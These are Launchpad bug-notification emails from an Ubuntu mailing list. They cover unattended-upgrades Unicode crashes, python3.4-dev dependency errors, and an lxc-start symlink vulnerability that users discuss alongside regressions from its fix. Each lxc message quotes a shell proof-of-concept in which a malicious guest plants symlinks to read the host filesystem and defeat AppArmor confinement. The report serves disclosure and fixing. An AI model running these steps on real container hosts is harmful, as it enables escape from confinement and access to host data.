[Touch-packages] [Bug 1554365] Re: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128)
This is the traceback from the logs in 16.04: apt.systemd.daily[957]: Traceback (most recent call last): apt.systemd.daily[957]: File "/usr/bin/unattended-upgrade", line 1473, in apt.systemd.daily[957]: main(options) apt.systemd.daily[957]: File "/usr/bin/unattended-upgrade", line 1411, in main apt.systemd.daily[957]: log_content = get_dpkg_log_content(logfile_dpkg, install_start_time) apt.systemd.daily[957]: File "/usr/bin/unattended-upgrade", line 1079, in get_dpkg_log_content apt.systemd.daily[957]: for line in fp.readlines(): apt.systemd.daily[957]: File "/usr/lib/python3.5/codecs.py", line 321, in decode apt.systemd.daily[957]: (result, consumed) = self._buffer_decode(data, self.errors, final) apt.systemd.daily[957]: UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfc in position 758: invalid start byte Could it be that dpkg logs according to locale settings? These are the ones on this host: LANG=de_DE LANGUAGE=de_DE: LC_CTYPE=de_DE.UTF-8 LC_NUMERIC="de_DE" LC_TIME="de_DE" LC_COLLATE="de_DE" LC_MONETARY="de_DE" LC_MESSAGES="de_DE" LC_PAPER="de_DE" LC_NAME="de_DE" LC_ADDRESS="de_DE" LC_TELEPHONE="de_DE" LC_MEASUREMENT="de_DE" LC_IDENTIFICATION="de_DE" LC_ALL= -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to unattended-upgrades in Ubuntu. https://bugs.launchpad.net/bugs/1554365 Title: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128) Status in unattended-upgrades package in Ubuntu: New Bug description: I got this in the mail: From: Cron Daemon To: root@... Subject: Cron test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) Date: Thu, 25 Feb 2016 02:11:47 +0200 (EET) /etc/cron.daily/apt: Traceback (most recent call last): File "/usr/bin/unattended-upgrade", line 1255, in main(options) File "/usr/bin/unattended-upgrade", line 1205, in main pkgs, pkg_install_success, pkgs_kept_back, mem_log, logfile_dpkg) File "/usr/bin/unattended-upgrade", line 752, in send_summary_mail body += fp.read() File "/usr/lib/python3.4/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128) According to /var/log/apt/history.log.1.gz, the packages upgraded that day were Start-Date: 2016-02-25 02:06:22 Upgrade: libgnutls-openssl27:amd64 (2.12.23-12ubuntu2.4, 2.12.23-12ubuntu2.5), libssl1.0.0:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17), libvirt0:amd64 (1.2.2-0ubuntu13.1.16, 1.2.2-0ubuntu13.1.17), libssl-dev:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17), ca-certificates:amd64 (20141019ubuntu0.14.04.1, 20160104ubuntu0.14.04.1), libgnutls26:amd64 (2.12.23-12ubuntu2.4, 2.12.23-12ubuntu2.5), libssl-doc:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17), openssl:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17) End-Date: 2016-02-25 02:06:36 ProblemType: Bug DistroRelease: Ubuntu 14.04 Package: unattended-upgrades 0.82.1ubuntu2.4 Uname: Linux 2.6.32-042stab108.8 x86_64 ApportVersion: 2.14.1-0ubuntu3.19 Architecture: amd64 Date: Tue Mar 8 08:26:05 2016 PackageArchitecture: all ProcEnviron: LC_CTYPE=lt_LT.UTF-8 TERM=xterm-256color PATH=(custom, no user) LANG=lt_LT.UTF-8 SHELL=/bin/bash SourcePackage: unattended-upgrades UpgradeStatus: Upgraded to trusty on 2016-02-06 (30 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/unattended-upgrades/+bug/1554365/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1554365] Re: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128)
This still exists in 16.04 and is hitting uns every day. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to unattended-upgrades in Ubuntu. https://bugs.launchpad.net/bugs/1554365 Title: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128) Status in unattended-upgrades package in Ubuntu: New Bug description: I got this in the mail: From: Cron Daemon To: root@... Subject: Cron test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) Date: Thu, 25 Feb 2016 02:11:47 +0200 (EET) /etc/cron.daily/apt: Traceback (most recent call last): File "/usr/bin/unattended-upgrade", line 1255, in main(options) File "/usr/bin/unattended-upgrade", line 1205, in main pkgs, pkg_install_success, pkgs_kept_back, mem_log, logfile_dpkg) File "/usr/bin/unattended-upgrade", line 752, in send_summary_mail body += fp.read() File "/usr/lib/python3.4/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 2886: ordinal not in range(128) According to /var/log/apt/history.log.1.gz, the packages upgraded that day were Start-Date: 2016-02-25 02:06:22 Upgrade: libgnutls-openssl27:amd64 (2.12.23-12ubuntu2.4, 2.12.23-12ubuntu2.5), libssl1.0.0:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17), libvirt0:amd64 (1.2.2-0ubuntu13.1.16, 1.2.2-0ubuntu13.1.17), libssl-dev:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17), ca-certificates:amd64 (20141019ubuntu0.14.04.1, 20160104ubuntu0.14.04.1), libgnutls26:amd64 (2.12.23-12ubuntu2.4, 2.12.23-12ubuntu2.5), libssl-doc:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17), openssl:amd64 (1.0.1f-1ubuntu2.16, 1.0.1f-1ubuntu2.17) End-Date: 2016-02-25 02:06:36 ProblemType: Bug DistroRelease: Ubuntu 14.04 Package: unattended-upgrades 0.82.1ubuntu2.4 Uname: Linux 2.6.32-042stab108.8 x86_64 ApportVersion: 2.14.1-0ubuntu3.19 Architecture: amd64 Date: Tue Mar 8 08:26:05 2016 PackageArchitecture: all ProcEnviron: LC_CTYPE=lt_LT.UTF-8 TERM=xterm-256color PATH=(custom, no user) LANG=lt_LT.UTF-8 SHELL=/bin/bash SourcePackage: unattended-upgrades UpgradeStatus: Upgraded to trusty on 2016-02-06 (30 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/unattended-upgrades/+bug/1554365/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1503382] Re: unable to install python3.4 dev on fresh ubuntu cloud image
Affects me too, but forced downgrading destroys python libraries it seems: virtualenv -p /usr/bin/python3 env Running virtualenv with interpreter /usr/bin/python3 Using base prefix '/usr' New python executable in env/bin/python3 Also creating executable in env/bin/python Installing setuptools, pip... Complete output from command /home/user/jobs/env/bin/python3 -c "import sys, pip; sys...d\"] + sys.argv[1:]))" setuptools pip: Traceback (most recent call last): File "/usr/lib/python3.4/queue.py", line 4, in import threading ImportError: No module named 'threading' During handling of the above exception, another exception occurred: Traceback (most recent call last): File "", line 1, in File "/usr/share/python-virtualenv/pip-1.5debian1-py2.py3-none-any.whl/pip/__init__.py", line 9, in File "/usr/share/python-virtualenv/pip-1.5debian1-py2.py3-none-any.whl/pip/log.py", line 8, in File "/usr/share/python-virtualenv/pip-1.5debian1-py2.py3-none-any.whl/pip/backwardcompat/__init__.py", line 33, in File "/usr/lib/python3.4/queue.py", line 6, in import dummy_threading as threading File "/usr/lib/python3.4/dummy_threading.py", line 45, in import threading ImportError: No module named 'threading' ...Installing setuptools, pip...done. Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 2339, in main() File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 825, in main symlink=options.symlink) File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 993, in create_environment install_wheel(to_install, py_executable, search_dirs) File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 961, in install_wheel 'PIP_NO_INDEX': '1' File "/usr/lib/python2.7/dist-packages/virtualenv.py", line 903, in call_subprocess % (cmd_desc, proc.returncode)) OSError: Command /home/user/jobs/env/bin/python3 -c "import sys, pip; sys...d\"] + sys.argv[1:]))" setuptools pip failed with error code 1 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to python3.4 in Ubuntu. https://bugs.launchpad.net/bugs/1503382 Title: unable to install python3.4 dev on fresh ubuntu cloud image Status in python3.4 package in Ubuntu: Confirmed Bug description: Latest cloud ubuntu trusty image (06-Oct-2015 10:34) https://cloud- images.ubuntu.com/trusty/current/ apt-get update && apt-get upgrade # works fine # apt-get install python3.4-dev Reading package lists... Done Building dependency tree Reading state information... Done Some packages could not be installed. This may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of Incoming. The following information may help to resolve the situation: The following packages have unmet dependencies: python3.4-dev : Depends: python3.4 (= 3.4.0-2ubuntu1.1) but 3.4.3-1ubuntu1~14.04.1 is to be installed Depends: libpython3.4-dev (= 3.4.0-2ubuntu1.1) but it is not going to be installed Depends: libpython3.4 (= 3.4.0-2ubuntu1.1) but it is not going to be installed E: Unable to correct problems, you have held broken packages. # apt-get install libpython3.4-dev Reading package lists... Done Building dependency tree Reading state information... Done Some packages could not be installed. This may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of Incoming. The following information may help to resolve the situation: The following packages have unmet dependencies: libpython3.4-dev : Depends: libpython3.4-stdlib (= 3.4.0-2ubuntu1.1) but 3.4.3-1ubuntu1~14.04.1 is to be installed Depends: libpython3.4 (= 3.4.0-2ubuntu1.1) but it is not going to be installed E: Unable to correct problems, you have held broken packages. ProblemType: Bug DistroRelease: Ubuntu 14.04 Package: python3.4-dev (not installed) ProcVersionSignature: Ubuntu 3.13.0-65.105-generic 3.13.11-ckt26 Uname: Linux 3.13.0-65-generic x86_64 ApportVersion: 2.14.1-0ubuntu3.15 Architecture: amd64 Date: Tue Oct 6 17:36:17 2015 SourcePackage: python3.4 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/python3.4/+bug/1503382/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
Regression fix fixes it on 14.04 LTS. Confirmed. Thanks! -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
@roman-fiedler Might point to the same, but we already have relative mount targets: lxc.mount.entry = proc /var/lib/our_containers/123/rootfs/proc proc nosuid,nodev,noexec 0 0 So that won't help as suggested in the mail. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
@roman-fiedler We're using absolute mount targets here, so that might help. Will try this out. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
The problem lies in the ubuntu patch
http://archive.ubuntu.com/ubuntu/pool/main/l/lxc/lxc_1.0.7-0ubuntu0.5.debian.tar.gz
where this code
+ size_t start = croot ? strlen(croot) : 0;
+ if (strcmp(ws + start, target + start) != 0) {
+ ERROR("Mount onto %s resulted in %s\n", target, ws);
+ goto out;
+ }
in file 0003-CVE-2015-1335.patch checks if ws and start are the same.
According to the given error (which I forgot to paste above), ws and target ARE
different:
lxc-start: utils.c: ensure_not_symlink: 1384 Mount onto /usr/lib/x86_64
-linux-gnu/lxc//proc resulted in /usr/lib/x86_64-linux-gnu/lxc/proc
So target is
/usr/lib/x86_64-linux-gnu/lxc//proc
and ws is
/usr/lib/x86_64-linux-gnu/lxc/proc
Any hints how we could prevent the double slashing? Or would you just
"clean up" the path somehow?
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662
Title:
lxc-start symlink vulnerabilities may allow guest to read host
filesystem, interfere with apparmor
Status in lxc package in Ubuntu:
Fix Released
Bug description:
lxc-start shuffles around mounts using helper directory
/usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
It then modifies mounts operating in guest root directory before
invoking init. As it does not check if all mount points are
directories, a malicious guest may modify its internal structure
before shutdown (or was created using manipulated image) and then when
started again, guest may
* Access the whole host root filesystem
* Block switching from lxc-start apparmor profile to lxc-container-
default
# Real putold before pivot-root (root fs will end here)
mkdir -p /x/lxc_putold
# Faked putold
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
# proc fake
mkdir -p /x/proc
umount /proc
rmdir /proc
ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr
/usr/lib/x86_64-linux-gnu/lxc/x/proc/self
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
The issue was also found during
https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor
We're getting lxc-start: utils.c: safe_mount: 1409 Mount of 'proc' onto '/usr/lib/x86_64-linux-gnu/lxc//proc' was onto a symlink! on all containers since we upgraded to 1.0.7-0ubuntu0.5 and they don't start. No container has /proc as a symlink. Plese tell me what information is required from me. We downgraded to 1.0.6-0ubuntu0.1 which works. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
